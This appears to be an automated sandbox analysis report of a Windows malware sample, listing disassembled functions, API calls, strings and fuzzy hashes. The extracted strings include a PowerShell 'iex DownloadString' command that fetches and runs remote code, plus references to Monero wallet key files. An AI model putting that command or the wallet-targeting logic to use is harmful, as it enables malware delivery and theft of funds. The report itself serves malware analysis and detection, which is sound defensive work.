                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: e073a0c221e6fda998e12a035e36e44226c2d38fc73d6c9bbe6eaad883f7cd7a
                              • Instruction ID: 3a3b4262729f87c763d02612278d79cff3337faf4cf63b702aca391621eea431
                              • Opcode Fuzzy Hash: e073a0c221e6fda998e12a035e36e44226c2d38fc73d6c9bbe6eaad883f7cd7a
                              • Instruction Fuzzy Hash: EF41ED75C0020C9BDB54FBA1C896FEDB774AF10308F50411EE016A7191DF786A5ACFA9
                              Function 004B9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 004B9F41
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 915f02962cdac0eabeb8de86063ca259831c1b116f3ed4afadc40acf56f15255
                              • Instruction ID: af3b299ffea711cfca7222b2aa4696261a8ef3ff06b4ac4ef520843663e2a004
                              • Opcode Fuzzy Hash: 915f02962cdac0eabeb8de86063ca259831c1b116f3ed4afadc40acf56f15255
                              • Instruction Fuzzy Hash: BC61517490024CABDB24EFA5CC96FED7775AF54308F00801EF90A5F291DB786A16CB66
                              Function 004C70D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              • memset.MSVCRT ref: 004C716A
                              Strings
                              • sL, xrefs: 004C7111
                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 004C718C
                              • sL, xrefs: 004C72AE, 004C7179, 004C717C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpymemset
                              • String ID: sL$sL$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                              • API String ID: 4047604823-1272997629
                              • Opcode ID: c45cb04913859763d0b1b0ede5da1ad23f6edfe4e17001c18fb97a662e182b53
                              • Instruction ID: 4c1232d13a1e1333692eb88b0c847c435fa547e7b80b505414bbabbaef3a0c4d
                              • Opcode Fuzzy Hash: c45cb04913859763d0b1b0ede5da1ad23f6edfe4e17001c18fb97a662e182b53
                              • Instruction Fuzzy Hash: E75180B4C042089BDB54EB91DC95FEEB774AF44308F1480AEE50577281EB786E88CF69
                              Function 004C7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004C7E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C7E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,0117B688,00000000,00020119,?), ref: 004C7E5E
                              • RegQueryValueExA.ADVAPI32(?,0118D280,00000000,00000000,000000FF,000000FF), ref: 004C7E7F
                              • RegCloseKey.ADVAPI32(?), ref: 004C7E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 5a7db9fded26a09c20f44eb962412a5ead23730f8350280f34dffd15bb8cb038
                              • Instruction ID: 079f0b562e2de1c0377dc0421dc2d2c0d0a4e5d27b0876dc1d62b31daceab00b
                              • Opcode Fuzzy Hash: 5a7db9fded26a09c20f44eb962412a5ead23730f8350280f34dffd15bb8cb038
                              • Instruction Fuzzy Hash: 5D114FB6A44205EBD700DFD4DD49F7BBBB9EB04710F10415AF619A7280D7B85801CBA6
                              Function 004C9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(0118DC08,?,?,?,004C140C,?,0118DC08,00000000), ref: 004C926C
                              • lstrcpyn.KERNEL32(006FAB88,0118DC08,0118DC08,?,004C140C,?,0118DC08), ref: 004C9290
                              • lstrlen.KERNEL32(?,?,004C140C,?,0118DC08), ref: 004C92A7
                              • wsprintfA.USER32 ref: 004C92C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 091f60cbc5bc61f6e26665ae5341d7b097717db3b3db32064cb31bc2fe62f84b
                              • Instruction ID: 6be2e55877523e6cf95a0e4fe8625643c428f6f421a706355ab8ad12a0b9cc61
                              • Opcode Fuzzy Hash: 091f60cbc5bc61f6e26665ae5341d7b097717db3b3db32064cb31bc2fe62f84b
                              • Instruction Fuzzy Hash: 4401E5B9504108FFCB04DFE8C998EBE7BBAEB48350F108548F9098B204C635AA41DB95
                              Function 004B12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004B12B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004B12BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004B12D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004B12F5
                              • RegCloseKey.ADVAPI32(?), ref: 004B12FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 53368b4d650111f1a83e2472dc967fb920018b9d115d012670150e1487f7e781
                              • Instruction ID: 6104bbabc12df88ba24e92fc3d1b7c7b06eca7bbff38a91e80192d51233dc66a
                              • Opcode Fuzzy Hash: 53368b4d650111f1a83e2472dc967fb920018b9d115d012670150e1487f7e781
                              • Instruction Fuzzy Hash: A50131F9A40208BFDB04DFE4DC49FAEB7B9EB48701F008159FA1997280D674AA01CF51
                              Function 004C6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 004C6663
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004C6726
                              • ExitProcess.KERNEL32 ref: 004C6755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: a78c32f3f4262585b21ee90d12ad63f35a2bd02eac5da74ff1d87298ebfe7c73
                              • Instruction ID: 366de0615512e7c27a5f6a2a61fe0ac3c3bdbb438da7d12028cbbd00493f1cf3
                              • Opcode Fuzzy Hash: a78c32f3f4262585b21ee90d12ad63f35a2bd02eac5da74ff1d87298ebfe7c73
                              • Instruction Fuzzy Hash: 8A314DF5801208ABDB54EB91DC82FED7778AF04308F40519EF20966191DF786B48CF6A
                              Function 004C87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,004D0E28,00000000,?), ref: 004C882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C8836
                              • wsprintfA.USER32 ref: 004C8850
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 9ce6366af78c6837f5c4233c53be09f08a48f3cd4c4717f9bc57bcdde89df035
                              • Instruction ID: 33fb7b4599fc276a5b0bc0e80561283ed252a23a44af25104f7fb0e14344beea
                              • Opcode Fuzzy Hash: 9ce6366af78c6837f5c4233c53be09f08a48f3cd4c4717f9bc57bcdde89df035
                              • Instruction Fuzzy Hash: A9211AB5A40208AFDB04DFD8DD49FBEBBB9FB48711F104119F619A7280C779A901CBA5
                              Function 004C8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004C951E,00000000), ref: 004C8D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C8D62
                              • wsprintfW.USER32 ref: 004C8D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 23efdb5d3a2c8ecf2541cd98d6fb55f983d8a701799cc13c007c572100189b41
                              • Instruction ID: 8450420981c91e453de1862acb81d4cfaf4ba007c300fb1eae3b04b4468db6d2
                              • Opcode Fuzzy Hash: 23efdb5d3a2c8ecf2541cd98d6fb55f983d8a701799cc13c007c572100189b41
                              • Instruction Fuzzy Hash: 34E08CB5A40208BFC700EBD4DC0AE6977B8EB04702F000195FD0E87280DAB19E00DB96
                              Function 004BA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004C8B60: GetSystemTime.KERNEL32(004D0E1A,0118CF88,004D05AE,?,?,004B13F9,?,0000001A,004D0E1A,00000000,?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004C8B86
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004BA2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 004BA3FF
                              • lstrlen.KERNEL32(00000000), ref: 004BA6BC
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 004BA743
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 4784ffacdbc52879d44cdc0d6dcf57eecf168c1d907a19665d841ee4a77388cf
                              • Instruction ID: d557c9f88a8c9c87c7739604d13c68bff3f0b096036f9a41fceb18839b9df124
                              • Opcode Fuzzy Hash: 4784ffacdbc52879d44cdc0d6dcf57eecf168c1d907a19665d841ee4a77388cf
                              • Instruction Fuzzy Hash: 86E1F17681010C9BCB54FBA5DC92FEE7338AF14308F50856EF51672091EE386A19CB7A
                              Function 004BD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004C8B60: GetSystemTime.KERNEL32(004D0E1A,0118CF88,004D05AE,?,?,004B13F9,?,0000001A,004D0E1A,00000000,?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004C8B86
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004BD481
                              • lstrlen.KERNEL32(00000000), ref: 004BD698
                              • lstrlen.KERNEL32(00000000), ref: 004BD6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 004BD72B
